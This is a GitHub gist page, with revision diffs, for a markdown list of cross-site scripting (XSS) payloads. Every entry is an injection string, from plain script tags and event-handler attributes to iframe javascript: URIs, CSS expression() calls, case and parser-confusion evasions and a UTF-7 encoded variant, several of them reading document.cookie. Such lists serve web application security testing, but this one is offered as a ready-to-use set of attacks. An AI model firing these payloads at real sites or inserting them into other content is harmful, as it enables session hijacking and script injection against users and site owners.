Skip to content

Instantly share code, notes, and snippets.

@hakatashi
Forked from ntddk/xss.md
Last active August 29, 2015 14:07
Show Gist options
  • Select an option

  • Save hakatashi/0a8915f72e4630e30c8c to your computer and use it in GitHub Desktop.

Select an option

Save hakatashi/0a8915f72e4630e30c8c to your computer and use it in GitHub Desktop.

Revisions

  1. hakatashi revised this gist Oct 9, 2014. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion xss.md
    Original file line number Diff line number Diff line change
    @@ -16,4 +16,4 @@
    * `"><svg><script>alert&#40/1/.source&#41</script>`
    * `<div style="left:expression(alert('XSS'))">`
    * `<div style="left:expRessioN(alert('XSS'))">`
    * `+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-`
    * `+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4APA-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-`
  2. hakatashi revised this gist Oct 9, 2014. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion xss.md
    Original file line number Diff line number Diff line change
    @@ -15,4 +15,5 @@
    * `<svg><style><img/src=x onerror=alert(XSS)// </b>`
    * `"><svg><script>alert&#40/1/.source&#41</script>`
    * `<div style="left:expression(alert('XSS'))">`
    * `<div style="left:expRessioN(alert('XSS'))">`
    * `<div style="left:expRessioN(alert('XSS'))">`
    * `+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-`
  3. @ntddk ntddk created this gist Oct 8, 2014.
    18 changes: 18 additions & 0 deletions xss.md
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,18 @@
    * `'';!--"<XSS>=&{()}``\"`
    * `<script>alert(XSS);</script>`
    * `"><script>alert(XSS);</script>`
    * `<ScrIpt>alert(1);</SCript>`
    * `<a onmouseover="alert(document.cookie)">XSS</a>`
    * `<a onmouseover=alert(document.cookie)>XSS</a>`
    * `<<script>alert("XSS");//<</script>`
    * `<iframe src="javascript:alert('XSS');"></iframe>`
    * `<iframe src=# onmouseover="alert(document.cookie)"></iframe>`
    * `<img src="http://www.example.com/>"onerror="alert(document.cookie)//<">`
    * `<![CDATA["><script>alert("XSS")</script><!--]]>`
    * `";alert(document.domain)//`
    * `<SELECT NAME="" onmouseover=alert(XSS)></select>`
    * `<style><img src='</style><img src=x onerror=alert("XSS")//'>`
    * `<svg><style><img/src=x onerror=alert(XSS)// </b>`
    * `"><svg><script>alert&#40/1/.source&#41</script>`
    * `<div style="left:expression(alert('XSS'))">`
    * `<div style="left:expRessioN(alert('XSS'))">`